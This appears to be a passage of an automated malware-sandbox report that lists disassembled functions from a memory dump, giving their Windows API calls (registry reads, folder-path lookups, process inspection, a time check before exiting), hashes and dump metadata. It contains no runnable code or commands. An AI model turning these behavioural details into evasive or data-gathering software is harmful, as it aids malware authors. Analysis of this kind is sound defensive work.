                                  Strings
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB
                                  • API String ID: 2922868504-2651807785
                                  • Opcode ID: e439d1b8655f5958304dd75368c4c47b0fd38efec968a066debef1628125aabd
                                  • Instruction ID: ede02886ac42383acbc778a725dc27389083b0ff1c4213f6b9d88221c15ffea4
                                  • Opcode Fuzzy Hash: e439d1b8655f5958304dd75368c4c47b0fd38efec968a066debef1628125aabd
                                  • Instruction Fuzzy Hash: B401D8B1E04214AFDB04DFA8DC45BAEBBBDFB44711F54412AF906E73C0D778590086A9
                                  APIs
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlenmemset
                                  • String ID:
                                  • API String ID: 3212139465-0
                                  • Opcode ID: 5bb3803fbc36b76d5aa0bdf78c589e6ba2a996175721ee432596236d89cafbc7
                                  • Instruction ID: 150e193dc91747fb5119aac42e8f6c94bb881f2a3325ce9d639a183725792515
                                  • Opcode Fuzzy Hash: 5bb3803fbc36b76d5aa0bdf78c589e6ba2a996175721ee432596236d89cafbc7
                                  • Instruction Fuzzy Hash: F481E570E00205ABDB14DB95DD48BAEB7B5AF84304F18817AE508B73C1EBB99D45CB98
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F7F31
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F7F60
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F7FA5
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F7FD3
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F8007
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 66c0647950175526dd4608730b6973ed2dd9fa1ffd53034208c052e77f32f736
                                  • Instruction ID: 3848af3306c8f7b3a4a97890aef805a014e8316241153f1692581d358c46f6de
                                  • Opcode Fuzzy Hash: 66c0647950175526dd4608730b6973ed2dd9fa1ffd53034208c052e77f32f736
                                  • Instruction Fuzzy Hash: AE41923090421ADFCB22DF68D880EAE77B8FF54300F124199E905DB351EB70AA65CB91
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 003F80BB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F80EA
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003F8102
                                  • lstrlen.KERNEL32(00000000), ref: 003F8140
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003F816F
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: c5ee728d8c39ab3a05440f4d1477117fe0b0ccf53e2aa719ce8cfe901fbeee4b
                                  • Instruction ID: f814cddcdb96ba351b4afd931c648ed2af54a63156f0349802ed7d1ed4284ab6
                                  • Opcode Fuzzy Hash: c5ee728d8c39ab3a05440f4d1477117fe0b0ccf53e2aa719ce8cfe901fbeee4b
                                  • Instruction Fuzzy Hash: 9141AD3560010AAFCB26DF78D944BAABBF8EF44700F15825DA949D7244EF34D946CB90
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 00401B72
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,0040CFEC), ref: 0040184F
                                    • Part of subcall function 00401820: lstrlen.KERNEL32(01196D30), ref: 00401860
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 00401887
                                    • Part of subcall function 00401820: lstrcat.KERNEL32(00000000,00000000), ref: 00401892
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 004018C1
                                    • Part of subcall function 00401820: lstrlen.KERNEL32(00414FA0), ref: 004018D3
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 004018F4
                                    • Part of subcall function 00401820: lstrcat.KERNEL32(00000000,00414FA0), ref: 00401900
                                    • Part of subcall function 00401820: lstrcpy.KERNEL32(00000000,00000000), ref: 0040192F
                                  • sscanf.NTDLL ref: 00401B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00401BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00401BC6
                                  • ExitProcess.KERNEL32 ref: 00401BE3
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: eff2605a4646b24843e745c15f784a717a420d44b3a94f4ea5ecae32a8f4b8ce
                                  • Instruction ID: c11dba737a3768f9d21b3cd3efb1a1d5e305c6057260892cb6b125be5862a4f5
                                  • Opcode Fuzzy Hash: eff2605a4646b24843e745c15f784a717a420d44b3a94f4ea5ecae32a8f4b8ce
                                  • Instruction Fuzzy Hash: BF21E4B1518301AF8350DF65D88489BBBF9EFD8315F409A1EF599C3260E734E5048BA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00403166
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040316D
                                  • RegOpenKeyExA.ADVAPI32(80000002,0119BC50,00000000,00020119,?), ref: 0040318C
                                  • RegQueryValueExA.ADVAPI32(?,011AF178,00000000,00000000,00000000,000000FF), ref: 004031A7
                                  • RegCloseKey.ADVAPI32(?), ref: 004031B1
                                   Memory Dump Source
                                   • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated dumps: same list as for the first function above
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: ecd85a1c0c07ef789dfc5a2b4f138f3a363fd90ebb08955f900716e5d7cbf05d
                                  • Instruction ID: adecec09d813ef318e89b4d6510fe26187bcae3fbd1d5c631f212af0c797eda1
                                  • Opcode Fuzzy Hash: ecd85a1c0c07ef789dfc5a2b4f138f3a363fd90ebb08955f900716e5d7cbf05d
                                  • Instruction Fuzzy Hash: 7B114276A40205AFD714CF95DD45FEBBBBDE748B11F10822AFA05E3680DB75590087A1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E8996
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1D5
                                    • Part of subcall function 0040A1C0: std::exception::exception.LIBCMT ref: 0040A1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E89CD
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 0f48d5d203e61ddbbb5a6a1118004955240a988b99e3720ea768b740f24670e4
                                  • Instruction ID: e3a2ed5f2496b38cf43cd3169d04d10d2aca340d3942317228209849d6a0b41d
                                  • Opcode Fuzzy Hash: 0f48d5d203e61ddbbb5a6a1118004955240a988b99e3720ea768b740f24670e4
                                  • Instruction Fuzzy Hash: 8521DB72B002A08BC722DB5DE840A6AF795DBA1761B110A3FF155CB2C1CB71D851C3A9
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E8883
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 9cf85e58440a098ebd7d0955937c43d6b8a8594b964d71b1bb64a434bcc38610
                                  • Instruction ID: 1e2d2e16b01d64fb785f56a1a8f07214d039bc8d39e4f9440b0d7ffebeab2a58
                                  • Opcode Fuzzy Hash: 9cf85e58440a098ebd7d0955937c43d6b8a8594b964d71b1bb64a434bcc38610
                                  • Instruction Fuzzy Hash: F031C7B5E005159FCB08DF58C8906AEBBB6EB88350F148279E919EF385DB34AD01CBD1
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405922
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00405935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: b37b2b5713ec790fca700b11953d86ef07fffc013cf4e2e831a0bc0efa35055d
                                  • Instruction ID: b1a53de103974bf6cb36f84a15e834d8c461912da7f4ec65e90d6d696441d61a
                                  • Opcode Fuzzy Hash: b37b2b5713ec790fca700b11953d86ef07fffc013cf4e2e831a0bc0efa35055d
                                  • Instruction Fuzzy Hash: C3115170304B40CBC7218B2CA900B1B77E1EBD2760F250A6FE0D19B6D5C775D841CBA9
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0040A430,000000FF), ref: 00403D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00403D27
                                  • wsprintfA.USER32 ref: 00403D37
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 651aa80b1aab8ccad508ed3e5926bec80654d41e44ccf4e47354c076cb899366
                                  • Instruction ID: c210310cf0420003b38bca1a77ac680061be19ec5fa0c3afc922d525d716e542
                                  • Opcode Fuzzy Hash: 651aa80b1aab8ccad508ed3e5926bec80654d41e44ccf4e47354c076cb899366
                                  • Instruction Fuzzy Hash: 8F01C071A40300BFE7109B55DC4AFAABB79FB49B62F18411AFA05E72D0CBB41900C6B6
                                  APIs
                                  • __getptd.LIBCMT ref: 00409279
                                    • Part of subcall function 004087FF: __amsg_exit.LIBCMT ref: 0040880F
                                  • __amsg_exit.LIBCMT ref: 00409299
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit$__getptd
                                  • String ID: XuA$XuA
                                  • API String ID: 441000147-2907057905
                                  • Opcode ID: da0c810ff8d0a88f008529dc5025e5fa3e1883d752c66c6335f50707b5b84182
                                  • Instruction ID: 2f1cf5760e44fdbc6f77484325d49518b8569d4e650cd22a499e9878ebd393b7
                                  • Opcode Fuzzy Hash: da0c810ff8d0a88f008529dc5025e5fa3e1883d752c66c6335f50707b5b84182
                                  • Instruction Fuzzy Hash: 04016D32D86A15ABDB11BB6A984579AB3606F00B18F18447FE800776C6CB3C6D41DBDE
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 003E8737
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A188
                                    • Part of subcall function 0040A173: std::exception::exception.LIBCMT ref: 0040A1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: cba95a79d2db91cae91b99178446a33ff2b160a48fcbf7c31a5ef0cc2f2cd348
                                  • Instruction ID: 2ca198fab6d274b84c2b7a624fe7f8c09bb8d8d7a3a25150861a800f4e181f06
                                  • Opcode Fuzzy Hash: cba95a79d2db91cae91b99178446a33ff2b160a48fcbf7c31a5ef0cc2f2cd348
                                  • Instruction Fuzzy Hash: 48F09037F000310F8315663E8D8449EA94656E539033AD735E85EEF2D9DC71EC8295D4
                                  APIs
                                    • Part of subcall function 0040781C: __mtinitlocknum.LIBCMT ref: 00407832
                                    • Part of subcall function 0040781C: __amsg_exit.LIBCMT ref: 0040783E
                                  • ___addlocaleref.LIBCMT ref: 00408756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$XuA$xtA
                                  • API String ID: 3105635775-3658433698
                                  • Opcode ID: ce4343edb25dbe1a0f350be2c4c097a7a8d24cb99b5817370d82bbb5879c4aa1
                                  • Instruction ID: d5304a8195d48757963ea68b4c6d71e33e10c7708ac21da7642e079e83a449d4
                                  • Opcode Fuzzy Hash: ce4343edb25dbe1a0f350be2c4c097a7a8d24cb99b5817370d82bbb5879c4aa1
                                  • Instruction Fuzzy Hash: B6018472845700EAD720AF7AD84574AB7E0AF51318F20C92FE0D9676E5CBB8B544CB19
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FE544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE573
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE581
                                  • lstrcat.KERNEL32(?,011AF2D8), ref: 003FE59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 092a7a62d598c63e6cdb51325a89373f54da762ea56ea95e4af49b2cc170a9bd
                                  • Instruction ID: 28cf20535df9735acbfbdd083d743a147e6cc0fb81e7298c1b65ec777cf4eb64
                                  • Opcode Fuzzy Hash: 092a7a62d598c63e6cdb51325a89373f54da762ea56ea95e4af49b2cc170a9bd
                                  • Instruction Fuzzy Hash: C051BB76A1011CAFC756EB54DC82EFE337EEB48300F044569BA059B2D1EE70AE408BA1
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00401FDF, 00401FF5, 004020B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 9e0336d2bcea2b9127a09b2609a49097b372c93ef91d85bcdebcc373aeb724c3
                                  • Instruction ID: ff17e37fbbf7d450a420bcf5b3d098c8a50699e44cb5c80a529b37f6d2b3c408
                                  • Opcode Fuzzy Hash: 9e0336d2bcea2b9127a09b2609a49097b372c93ef91d85bcdebcc373aeb724c3
                                  • Instruction Fuzzy Hash: D721F5365103998AD720AA35C5486DEF3A6DB80361F944067CA192B3C1E2BA194BD79E
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FEBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FEBF1
                                  • lstrcat.KERNEL32(?,011B04C0), ref: 003FEC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: d6b37099950317d428c9fc96cd2da1f2c4d8710b0fca3db9974e04d903f0af32
                                  • Instruction ID: 8e2065697351048c76a6b77ba7e4fde5856ffec2cb9d5c0f0812338ebd42eb52
                                  • Opcode Fuzzy Hash: d6b37099950317d428c9fc96cd2da1f2c4d8710b0fca3db9974e04d903f0af32
                                  • Instruction Fuzzy Hash: 1E31CB7191016C9BCB16EF64DC41BEE73B9BF48300F145579BA06DB290DE709E448B90
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00404492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 004044AD
                                  • CloseHandle.KERNEL32(00000000), ref: 004044B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004044E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: 4b7eea8227b0c04ce76aeb988d7a97edae74e4365b3cf2dfc921e5a46a145d77
                                  • Instruction ID: d4174cc54809a6cdffe2cd61389c29afc795c6ea93e7b6a399f2bc5e5ec95ed0
                                  • Opcode Fuzzy Hash: 4b7eea8227b0c04ce76aeb988d7a97edae74e4365b3cf2dfc921e5a46a145d77
                                  • Instruction Fuzzy Hash: 5EF04CF08012253FE7209B709C09BE776A8AF44700F0441A2FB44E72C0DBB49D8087A4
                                  APIs
                                  • __getptd.LIBCMT ref: 00408FDD
                                    • Part of subcall function 004087FF: __amsg_exit.LIBCMT ref: 0040880F
                                  • __getptd.LIBCMT ref: 00408FF4
                                  • __amsg_exit.LIBCMT ref: 00409002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00409026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 3052f33832cc56f5f87bad7b2cab2fcdb318efffcb66e776ae14b6193cd1f705
                                  • Instruction ID: 8d0a15e23785817e83457bb6de279457a828c65a9e535bebd7db0ac14073c406
                                  • Opcode Fuzzy Hash: 3052f33832cc56f5f87bad7b2cab2fcdb318efffcb66e776ae14b6193cd1f705
                                  • Instruction Fuzzy Hash: FEF096329486109BD761BB7A980675D33A16F00718F24813FF444772D3DF7C6940E65E
                                  APIs
                                  • lstrlen.KERNEL32(------,003E5BEB), ref: 0040731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0040733F
                                  • lstrcat.KERNEL32(?,------), ref: 00407349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                   • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmp
